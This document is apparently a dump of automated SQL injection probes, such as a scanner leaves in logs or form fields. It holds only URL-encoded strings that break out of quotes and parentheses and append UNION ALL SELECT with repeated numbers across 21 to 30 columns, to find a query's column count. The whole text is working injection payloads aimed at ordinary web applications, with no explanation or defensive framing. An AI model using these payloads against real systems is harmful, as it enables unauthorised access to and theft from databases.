-4907%27%20UNION%20ALL%20SELECT%208042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%23 -9358%27%20UNION%20ALL%20SELECT%205164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%2C5164%23 -7546%27%20UNION%20ALL%20SELECT%202993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%2C2993%23 -3177%27%20UNION%20ALL%20SELECT%205590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%23 -8251%27%20UNION%20ALL%20SELECT%203287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%2C3287%23 -3456%27%20UNION%20ALL%20SELECT%202922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%2C2922%23 -9678%27%20UNION%20ALL%20SELECT%206954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%2C6954%23 -1955%22%29%20UNION%20ALL%20SELECT%204919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%2C4919%23 -9107%22%29%20UNION%20ALL%20SELECT%209822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%2C9822%23 -5400%22%29%20UNION%20ALL%20SELECT%208017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%2C8017%23 -5315%22%29%20UNION%20ALL%20SELECT%208785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%2C8785%23 -5357%22%29%20UNION%20ALL%20SELECT%209548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%2C9548%23 -2748%22%29%20UNION%20ALL%20SELECT%206881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%23 -5464%22%29%20UNION%20ALL%20SELECT%208698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%2C8698%23 -9775%22%29%20UNION%20ALL%20SELECT%204709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%23 -5177%22%29%20UNION%20ALL%20SELECT%205369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%23 -2420%22%29%20UNION%20ALL%20SELECT%203990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%2C3990%23 -7036%22%29%29%20UNION%20ALL%20SELECT%205091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%2C5091%23 -5770%22%29%29%20UNION%20ALL%20SELECT%204291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%2C4291%23 -3453%22%29%29%20UNION%20ALL%20SELECT%204895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%2C4895%23 -2380%22%29%29%20UNION%20ALL%20SELECT%201116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%2C1116%23 -5611%22%29%29%20UNION%20ALL%20SELECT%203075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%2C3075%23 -8700%22%29%29%20UNION%20ALL%20SELECT%205933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%2C5933%23 -4960%22%29%29%20UNION%20ALL%20SELECT%208370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%2C8370%23 -9515%22%29%29%20UNION%20ALL%20SELECT%207707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%2C7707%23 -3972%22%29%29%20UNION%20ALL%20SELECT%202344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%2C2344%23 -9614%22%29%29%20UNION%20ALL%20SELECT%206766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%2C6766%23 -5226%22%29%29%29%20UNION%20ALL%20SELECT%206398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%2C6398%23 -2779%22%29%29%29%20UNION%20ALL%20SELECT%204355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%23 -9155%22%29%29%29%20UNION%20ALL%20SELECT%208728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%2C8728%23 -1679%22%29%29%29%20UNION%20ALL%20SELECT%206607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%2C6607%23 -3338%22%29%29%29%20UNION%20ALL%20SELECT%201197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%2C1197%23 -5077%22%29%29%29%20UNION%20ALL%20SELECT%203541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%2C3541%23 -4759%22%29%29%29%20UNION%20ALL%20SELECT%201519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%2C1519%23 -2391%22%29%29%29%20UNION%20ALL%20SELECT%204463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%2C4463%23 -8327%22%29%29%29%20UNION%20ALL%20SELECT%201555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%2C1555%23 -5442%22%29%29%29%20UNION%20ALL%20SELECT%204899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%2C4899%23 -1852%22%20UNION%20ALL%20SELECT%209106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%2C9106%23 -7734%22%20UNION%20ALL%20SELECT%201520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%2C1520%23 -4223%22%20UNION%20ALL%20SELECT%201545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%2C1545%23 -2794%22%20UNION%20ALL%20SELECT%207017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%2C7017%23 -5557%22%20UNION%20ALL%20SELECT%207875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%2C7875%23 -2102%22%20UNION%20ALL%20SELECT%205572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%2C5572%23 -1157%22%20UNION%20ALL%20SELECT%202962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%2C2962%23 -4990%22%20UNION%20ALL%20SELECT%202104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%2C2104%23 -8569%22%20UNION%20ALL%20SELECT%209251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%2C9251%23 -5573%22%20UNION%20ALL%20SELECT%208400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%2C8400%23 -5734%22%29%20UNION%20ALL%20SELECT%207590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%2C7590%23 -9591%22%29%20UNION%20ALL%20SELECT%205956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%2C5956%23 -3312%22%29%20UNION%20ALL%20SELECT%209113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%2C9113%23 -9242%22%29%20UNION%20ALL%20SELECT%208947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%23 -9351%22%29%20UNION%20ALL%20SELECT%201089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%23 -5359%22%29%20UNION%20ALL%20SELECT%202930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%2C2930%23 -9047%22%29%20UNION%20ALL%20SELECT%208703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%23 -4170%22%29%20UNION%20ALL%20SELECT%202376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%23 -5580%22%29%20UNION%20ALL%20SELECT%204908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%2C4908%23 -2778%22%29%20UNION%20ALL%20SELECT%204686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%23 -3692%22%29%29%20UNION%20ALL%20SELECT%208311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%2C8311%23 -8474%22%29%29%20UNION%20ALL%20SELECT%205561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%23 -7876%22%29%29%20UNION%20ALL%20SELECT%204758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%2C4758%23 -9260%22%29%29%20UNION%20ALL%20SELECT%205159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%2C5159%23 -5069%22%29%29%20UNION%20ALL%20SELECT%208640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%2C8640%23 -8249%22%29%29%20UNION%20ALL%20SELECT%204534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%2C4534%23 -7986%22%29%29%20UNION%20ALL%20SELECT%204544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%2C4544%23 -2124%22%29%29%20UNION%20ALL%20SELECT%202568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%2C2568%23 -1336%22%29%29%20UNION%20ALL%20SELECT%207801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%23 -7212%22%29%29%20UNION%20ALL%20SELECT%202338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%23 -5237%22%29%29%29%20UNION%20ALL%20SELECT%208882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%2C8882%23 -2296%22%29%29%29%20UNION%20ALL%20SELECT%201794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%23 -6828%22%29%29%29%20UNION%20ALL%20SELECT%207524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%23 -1485%22%29%29%29%20UNION%20ALL%20SELECT%204421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%2C4421%23 -7949%22%29%29%29%20UNION%20ALL%20SELECT%205094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%2C5094%23 -3053%22%29%29%29%20UNION%20ALL%20SELECT%206541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%2C6541%23 -7939%22%29%29%29%20UNION%20ALL%20SELECT%208130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%2C8130%23 -9878%22%29%29%29%20UNION%20ALL%20SELECT%209601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%2C9601%23 -3580%22%29%29%29%20UNION%20ALL%20SELECT%204488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%2C4488%23 -8804%22%29%29%29%20UNION%20ALL%20SELECT%201443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%2C1443%23 -8859%22%20UNION%20ALL%20SELECT%206185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%2C6185%23 -6528%22%20UNION%20ALL%20SELECT%202616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%2C2616%23 -5553%22%20UNION%20ALL%20SELECT%204676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%2C4676%23 -6244%22%20UNION%20ALL%20SELECT%202570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%2C2570%23 -6580%22%20UNION%20ALL%20SELECT%204645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%2C4645%23 -6541%22%20UNION%20ALL%20SELECT%203382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%2C3382%23 -9240%22%20UNION%20ALL%20SELECT%209373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%2C9373%23 -3655%22%20UNION%20ALL%20SELECT%207177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%2C7177%23 -7447%22%20UNION%20ALL%20SELECT%208481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%2C8481%23 -2559%22%20UNION%20ALL%20SELECT%203748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%23 -5006%25%27%29%20UNION%20ALL%20SELECT%203190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%2C3190%23 -5447%25%27%29%20UNION%20ALL%20SELECT%209700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%2C9700%23 -9229%25%27%29%20UNION%20ALL%20SELECT%201761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%2C1761%23 -9594%25%27%29%20UNION%20ALL%20SELECT%204435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%2C4435%23 -5009%25%27%29%20UNION%20ALL%20SELECT%206323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%2C6323%23 -5659%25%27%29%20UNION%20ALL%20SELECT%203867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%2C3867%23 -7651%25%27%29%20UNION%20ALL%20SELECT%206490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%2C6490%23 -3785%25%27%29%20UNION%20ALL%20SELECT%202542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%2C2542%23 -5650%25%27%29%20UNION%20ALL%20SELECT%202094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%2C2094%23 -8797%25%27%29%20UNION%20ALL%20SELECT%204989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%2C4989%23 -8936%25%27%29%29%20UNION%20ALL%20SELECT%205893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%2C5893%23 